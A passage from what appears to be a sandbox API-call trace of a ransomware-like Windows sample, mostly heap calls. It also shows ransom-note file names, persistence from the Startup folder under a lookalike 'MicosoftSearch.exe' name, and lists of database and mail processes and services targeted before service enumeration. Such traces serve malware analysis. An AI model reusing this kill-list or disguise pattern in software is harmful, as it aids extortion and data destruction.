(HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca870 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca888 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca8a0 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca8b8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca8d0 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca8e8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca900 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca918 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca930 [0240.199] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbca3c8, Size=0x400) returned 0xb99ac8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca948 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca960 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xbca978 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca990 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xbca9a8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99ee8 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb99f00 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99f18 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99f30 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99f48 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82030 [0240.199] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99f60 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb99f78 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99f90 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99fa8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99fc0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb99fd8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb99ff0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a008 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a020 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a038 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a050 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a068 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a080 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a098 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a0b0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82040 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a0c8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a0e0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a0f8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a110 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a128 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a140 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a158 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a170 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a188 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb9a1a0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a1b8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb9a1d0 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a1e8 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a200 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a218 [0240.200] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a230 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a248 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a260 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a278 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a290 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a2a8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a2e8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a300 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a318 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a330 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a348 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a360 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a378 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a390 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a3a8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a3c0 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a3d8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a3f0 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a408 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a420 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9a438 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x12) returned 0xb839c0 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a450 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a468 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a480 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a498 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a4b0 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a4c8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a4e0 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a4f8 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a510 [0240.201] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a528 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a540 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a558 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a570 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a588 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a5a0 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a5b8 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a5d0 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a5e8 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a600 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a618 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a630 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a648 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a660 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xe) returned 0xb9a678 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a690 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82050 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a6a8 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82060 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a6e8 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a700 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a718 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a730 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a748 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a760 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a778 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a790 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a7a8 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a7c0 [0240.202] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a7d8 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a7f0 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a808 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a820 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82070 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a838 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a850 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a868 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a880 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a898 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a8b0 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a8c8 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82080 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x8) returned 0xb82090 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a8e0 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a8f8 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a910 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a928 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xa) returned 0xb9a940 [0240.203] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9a958 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99ac8, Size=0x800) returned 0xb9aad0 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9b9f8, Size=0x20) returned 0xb84290 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84290, Size=0x40) returned 0xb82998 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82998, Size=0x80) returned 0xbc7ad8 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b10, Size=0x8) returned 0xb99b20 [0240.203] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b20, Size=0x10) returned 0xb9b9f8 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9b9f8, Size=0x20) returned 0xb842e0 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba28, Size=0x20) returned 0xb84308 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84308, Size=0x40) returned 0xb82998 [0240.204] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba28, Size=0x20) returned 0xb84308 [0240.204] lstrlenW (lpString="Info.hta") returned 8 [0240.204] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbdbee8, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MicosoftSearch.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\micosoftsearch.exe")) returned 0x6e [0240.204] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbdbee8 | out: hHeap=0xb00000) returned 1 [0240.204] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb842e0, Size=0x40) returned 0xb82998 [0240.204] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba28, Size=0x20) returned 0xb842e0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba28, Size=0x20) returned 0xb84308 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb84308, Size=0x40) returned 0xb829e0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb829e0, Size=0x80) returned 0xbc7ad8 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xbc9ec0 [0240.205] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0240.205] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc9ec0 | out: hHeap=0xb00000) returned 1 [0240.205] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0xbdbee8, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc [0240.205] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbebef0 | out: hHeap=0xb00000) returned 1 [0240.205] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbdbee8 | out: hHeap=0xb00000) returned 1 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b20, Size=0x8) returned 0xb99b10 [0240.205] lstrlenW (lpString="%windir%;") returned 9 [0240.205] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb842e0 | out: hHeap=0xb00000) returned 1 [0240.205] lstrlenW (lpString="C:\\Windows;") returned 11 [0240.205] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba86d0 | out: hHeap=0xb00000) returned 1 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba40, Size=0x20) returned 0xb842e0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb842e0, Size=0x40) returned 0xb829e0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb829e0, Size=0x80) returned 0xbc7ad8 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb9baf0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b50, Size=0x8) returned 0xb99b60 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b60, Size=0x10) returned 0xb9ba88 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9ba88, Size=0x20) returned 0xb842e0 [0240.205] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b20, Size=0x8) returned 0xb99b60 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b30, Size=0x8) returned 0xb99b20 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b50, Size=0x8) returned 0xb99b70 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b70, Size=0x10) returned 0xb9db50 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9db50, Size=0x20) returned 0xb84308 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b60, Size=0x10) returned 0xb9db50 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b20, Size=0x10) returned 0xb9db80 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b60, Size=0x8) returned 0xb99b50 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99b80, Size=0x8) returned 0xb99b90 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9db50, Size=0x20) returned 0xb84330 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9db80, Size=0x20) returned 0xb84358 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99ba0, Size=0x8) returned 0xb99bb0 [0240.206] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dbf8, Size=0x20) returned 0xb843a8 [0240.206] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0xba86d0, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0240.206] lstrlenW (lpString="C:\\") returned 3 [0240.206] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fc18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fc18*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0240.207] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xba86d0 | out: hHeap=0xb00000) returned 1 [0240.207] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99be0, Size=0x82) returned 0xbca458 [0240.207] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99c00, Size=0x100) returned 0xb9baf0 [0240.207] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbca458, Size=0x104) returned 0xb9e368 [0240.207] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9baf0, Size=0x200) returned 0xb9e478 [0240.208] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb99bf0 | out: hHeap=0xb00000) returned 1 [0240.208] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9e478 | out: hHeap=0xb00000) returned 1 [0240.208] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dca0 | out: hHeap=0xb00000) returned 1 [0240.208] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7cf8 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dc58 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbc7c70 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dc88 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9e368 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dc70 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xbca4e8 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dcb8 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9e2d8 | out: hHeap=0xb00000) returned 1 [0240.209] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9dcd0 | out: hHeap=0xb00000) returned 1 [0240.209] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dcd0, Size=0x20) returned 0xb843d0 [0240.209] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb843d0, Size=0x40) returned 0xb829e0 [0240.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0xbcbec8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0240.210] WaitForMultipleObjects (nCount=0x2, lpHandles=0xb84a08*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 47 os_tid = 0x5c0 Thread: id = 49 os_tid = 0x5d0 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dc40 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dc40, Size=0x20) returned 0xb843d0 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb843d0, Size=0x40) returned 0xb82a28 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82a28, Size=0x80) returned 0xbc7ad8 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb9baf0 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dc40 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dc40, Size=0x20) returned 0xb843d0 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb843d0, Size=0x40) returned 0xb82a28 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb82a28, Size=0x80) returned 0xbc7ad8 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xbc7ad8, Size=0x100) returned 0xb9bbf8 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9dc40 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb99ba0 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dc10 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99ba0, Size=0x8) returned 0xb99bd0 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb83ac0 [0240.261] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99bd0, Size=0x10) returned 0xb9dc28 [0240.261] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x18) returned 0xb83ae0 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1a) returned 0xb843d0 [0240.262] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dc28, Size=0x20) returned 0xb843f8 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1c) returned 0xb84420 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x16) returned 0xb83b00 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x1a) returned 0xb84448 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xc) returned 0xb9dc28 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x4) returned 0xb99bd0 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x40) returned 0xb82a28 [0240.262] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99bd0, Size=0x8) returned 0xb99ba0 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x3c) returned 0xb82a70 [0240.262] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb99ba0, Size=0x10) returned 0xb9dbf8 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x14) returned 0xb83b20 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x18) returned 0xb83b40 [0240.262] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9dbf8, Size=0x20) returned 0xb84470 [0240.262] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x24) returned 0xbc9f98 [0240.262] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0240.262] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9baf0 | out: hHeap=0xb00000) returned 1 [0240.262] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0240.262] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb9bbf8 | out: hHeap=0xb00000) returned 1 [0240.262] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb84560 [0240.275] EnumServicesStatusExW (in: hSCManager=0xb84560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, 